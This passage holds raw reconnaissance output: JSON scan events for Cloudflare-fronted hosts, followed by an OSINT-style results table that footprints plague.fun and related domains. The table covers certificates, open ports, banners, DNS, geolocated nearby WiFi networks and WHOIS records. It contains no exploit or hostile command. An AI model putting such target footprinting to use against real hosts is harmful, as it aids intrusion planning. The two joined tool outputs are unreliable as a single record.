\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', u'time': u'2022-11-03T17:03:57.680807767Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.96.0', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940b24488fe22fafc8fabe4d547cbebe6bbcbebe6bb0974cd4f', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'400 The plain HTTP request was sent to HTTPS port', u'url': u'', u'header': {u'content-length': u'655', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'www.literaryscout.co.uk', u'summary': u'Server: cloudflare\r\nDate: Thu, 03 Nov 2022 17:03:57 GMT\r\nContent-Type: text/html\r\nContent-Length: 655\r\nConnection: close\r\nCF-RAY: -\r\n\nPage title: 400 The plain HTTP request was sent to HTTPS port\n\n\r\n400 The plain HTTP request was sent to HTTPS port\r\n\r\n

400 Bad Request

\r\n
The plain HTTP request was sent to HTTPS port
\r\n
cloudflare
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', u'time': u'2022-11-03T17:03:57.652410392Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.96.0', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e62b9c719824950ed000ece2d49eb8fb55d66fac2', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'301 Moved Permanently', u'url': u'', u'header': {u'content-length': u'162', u'location': u'https://www.literaryscout.co.uk/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'literaryscout.co.uk', u'summary': u'Date: Thu, 03 Nov 2022 17:03:58 GMT\r\nContent-Type: text/html\r\nContent-Length: 162\r\nConnection: close\r\nLocation: https://www.literaryscout.co.uk/\r\nCF-Ray: 7646afb79fcabbb0-FRA\r\nCF-Cache-Status: DYNAMIC\r\nki-cache-type: None\r\nKi-CF-Cache-Status: BYPASS\r\nki-edge: v=17.8\r\nX-Content-Type-Options: nosniff\r\nX-Edge-Location-Klb: 1\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=HCmfoNU%2B9oL6YPNZivxNLj9YuvCgpcm7upjIeEeo2Ov70Dcmfm8WvkBJc3R%2FcUtDC0b8h4PdroQq07nXdZDhyODsMBUFw0wBGWiEM3DsGWja8vIzvw0b%2F6vZ3XgyYhLs2E38CLo%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 301 Moved Permanently\n\n\r\n301 Moved Permanently\r\n\r\n

301 Moved Permanently

\r\n
nginx
\r\n\r\n\r\n', u'time': u'2022-11-03T17:03:58.355258706Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.96.0', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e62b9c719824950ed000ece2d49eb8fb57cf07d07', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'301 Moved Permanently', u'url': u'', u'header': {u'content-length': u'162', u'location': u'https://www.literaryscout.co.uk/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'www.literaryscout.co.uk', u'summary': u'Date: Thu, 03 Nov 2022 17:03:58 GMT\r\nContent-Type: text/html\r\nContent-Length: 162\r\nConnection: close\r\nLocation: https://www.literaryscout.co.uk/\r\nCF- 188.114.96.0 2022-12-18 00:04:00 Country No Country Name Extractor 0 0 1 0 None France rasputain.fr 2022-12-18 00:03:14 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:54:d1:cf:73:f4:06:da:67:36:31:1b:04:19:11:b7:02:21 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:41:57 2022 GMT Not After : Jun 6 17:41:56 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:99:c4:36:4d:b6:7c:39:c2:f1:77:60:a8:ba:f8: 1c:59:3e:dd:96:42:44:67:b8:8b:49:69:58:1a:9d: ae:aa:d4:88:d9:2c:d6:c2:df:95:1d:df:ac:20:80: f6:6c:90:00:e7:ce:f6:99:5d:a6:86:c6:4c:71:e4: 0a:11:87:6e:9d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 7C:C0:30:0A:42:D8:F4:C5:D8:B9:9F:B1:0D:6A:DF:8F:DE:76:96:BE X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Mar 8 18:41:57.493 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:70:F2:E0:AE:CF:85:A2:03:22:79:FB:17: 39:F6:2F:87:C6:15:E4:F1:18:13:A9:F1:82:72:E6:C7: 7E:9E:29:13:02:20:30:0A:4F:75:19:2A:CF:D1:C3:F7: A8:E4:23:2C:B2:7A:99:89:19:E6:BF:91:FC:02:88:FB: 7F:9C:BD:82:04:90 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Mar 8 18:41:57.948 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:5D:16:09:69:44:95:6C:EF:37:FF:ED:F6: DF:17:EC:69:D6:52:78:BA:45:66:C6:1B:4F:46:5D:AE: EF:24:43:F2:02:21:00:E1:1A:7D:CA:9B:93:9F:F9:9E: 3D:06:BC:DF:D0:E8:10:6C:83:BE:BC:7C:A3:59:72:65: 68:4A:22:D1:DB:28:92 Signature Algorithm: ecdsa-with-SHA384 30:66:02:31:00:85:09:85:22:e8:48:da:b2:41:e1:15:a0:ea: 71:65:bc:ea:15:0e:7c:ce:1f:90:f6:cf:0f:d0:23:48:68:37: 61:1a:b2:5a:5f:20:24:73:65:f2:d2:bf:f9:e7:6a:e6:1c:02: 31:00:b8:1a:26:15:77:4d:4a:dc:4f:46:e6:7c:94:6c:91:e2: 82:f4:4e:dd:4f:5d:d6:db:53:3e:d1:f2:6f:3d:cd:1c:82:3f: ed:11:fd:de:35:58:00:77:1d:b7:c3:45:b1:9e 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet8682 (Net ID: 00:01:36:5B:86:80) 37.780462,-122.390564 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2082 188.114.97.1 2022-12-18 00:12:08 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 172.67.147.230 2022-12-18 00:13:55 HTTP Status Code No Web Spider 0 0 2 0 None None http://plague.fun 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 2 0 None 8075 137.117.0.0/16 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77ad7674091a232a-ORD"]} 188.114.96.0 2022-12-18 00:06:44 Open TCP Port No Pulsedive 0 0 2 0 None 104.21.19.243:80 104.21.19.243 2022-12-18 00:03:23 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-113.w90-116.abo.wanadoo.fr 90.116.166.113 2022-12-18 00:16:26 SSL Certificate - Issued by No SSL Certificate Analyzer 0 0 2 0 None C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 188.114.96.3 2022-12-18 00:13:49 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: plague.co Registry Domain ID: D4A395B67AB204CFAABA57C93F6BB05A4-NSR Registrar WHOIS Server: whois.godaddy.com Registrar URL: whois.godaddy.com Updated Date: 2022-06-05T11:58:47Z Creation Date: 2018-05-30T17:52:58Z Registry Expiry Date: 2023-05-30T17:52:58Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns53.domaincontrol.com Name Server: ns54.domaincontrol.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:07Z <<< For more information on Whois status codes, please visit https://icann.org/epp The above WHOIS results have been redacted to remove potential personal data. The full WHOIS output may be available to individuals and organisations with a legitimate interest in accessing this data not outweighed by the fundamental privacy rights of the data subject. To find out more, or to make a request for access, please visit: RDDSrequest.nic.co. .CO Internet, S.A.S., the Administrator for .CO, has collected this information for the WHOIS database through Accredited Registrars. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the .CO Internet registry database. .CO Internet makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without .CO Internet's prior written permission. .CO Internet reserves the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. In some limited cases, domains that might appear as available in whois might not actually be available as they could be already registered and the whois not yet updated and/or they could be part of the Restricted list. In this cases, performing a check through your Registrar's (EPP check) will give you the actual status of the domain. Additionally, domains currently or previously used as extensions in 3rd level domains will not be available for registration in the 2nd level. For example, org.co, mil.co, edu.co, com.co, net.co, nom.co, arts.co, firm.co, info.co, int.co, web.co, rec.co, co.co. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.cointernet.co . Domain Name: plague.co Registry Domain ID: D4A395B67AB204CFAABA57C93F6BB05A4-NSR Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-05-31T11:58:48Z Creation Date: 2018-05-30T17:52:58Z Registrar Registration Expiration Date: 2023-05-30T17:52:58Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR440372327 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.co Registry Admin ID: CR440372329 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.co Registry Tech ID: CR440372328 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.co Name Server: NS53.DOMAINCONTROL.COM Name Server: NS54.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:08Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 2022-12-18 00:20:16 Netblock Membership No RIPE 0 0 3 0 None 90.116.0.0/16 90.116.149.183 2022-12-18 00:18:28 IP Address No DNS Resolver 22 0 2 0 None 81.88.48.102 webmail.zerotwo-best-waifu.online 2022-12-18 00:09:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.0:443 188.114.96.0/24 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77af968c6fa22d82-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WaveLAN Network VHome2B (Net ID: 00:02:2D:03:03:11) 37.7803446,-122.3906132 2022-12-18 00:03:29 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3225.webapps.net 81.88.52.225 2022-12-18 00:23:29 Raw DNS Records No DNS Raw Records 0 0 2 0 None autoconfig.zerotwo-best-waifu.online. 359 IN CNAME tb-fr.securemail.pro. autoconfig.zerotwo-best-waifu.online 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b135839fef2d4c-ORD Content-Encoding: gzip 188.114.97.1 2022-12-18 00:21:27 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b25f649e501417-ORD Content-Encoding: gzip 2606:4700:3037::6815:13f3 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WLAN (Net ID: 00:01:24:F0:97:C1) 37.780462,-122.390564 2022-12-18 00:31:46 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.nyc Registry Domain ID: D2449566-NYC Registrar WHOIS Server: whois.godaddy.com Registrar URL: whois.godaddy.com Updated Date: 2022-01-30T13:51:18Z Creation Date: 2017-01-25T15:47:03Z Registry Expiry Date: 2023-01-24T23:59:59Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: NYSPMA Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: New York Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns18.domaincontrol.com Name Server: ns17.domaincontrol.com DNSSEC: unsigned nyc ID: C2449551-NYC nyc Name: REDACTED FOR PRIVACY nyc Organization: REDACTED FOR PRIVACY nyc Street: REDACTED FOR PRIVACY nyc Street: REDACTED FOR PRIVACY nyc Street: REDACTED FOR PRIVACY nyc City: REDACTED FOR PRIVACY nyc State/Province: REDACTED FOR PRIVACY nyc Postal Code: REDACTED FOR PRIVACY nyc Country: REDACTED FOR PRIVACY nyc Phone: REDACTED FOR PRIVACY nyc Phone Ext: REDACTED FOR PRIVACY nyc Fax: REDACTED FOR PRIVACY nyc Fax Ext: REDACTED FOR PRIVACY nyc Email: nyc Nexus Category: ORG URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:46Z <<< For more information on Whois status codes, please visit https://icann.org/epp The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is: * inconsistent with any applicable laws, * inconsistent with any policy issued by us, * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or * to enable high volume, automated, electronic processes that apply to the Service. You acknowledge that: * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered, * we may restrict, suspend or terminate your access to the Service at any time, and * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent. This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion. Domain Name: plague.nyc Registry Domain ID: D2449566-NYC Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-01-25T13:51:19Z Creation Date: 2017-01-25T15:47:03Z Registrar Registration Expiration Date: 2023-01-24T23:59:59Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registrant Organization: NYSPMA Registrant State/Province: New York Registrant Country: US Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.nyc Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.nyc Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.nyc Name Server: NS17.DOMAINCONTROL.COM Name Server: NS18.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:46Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. 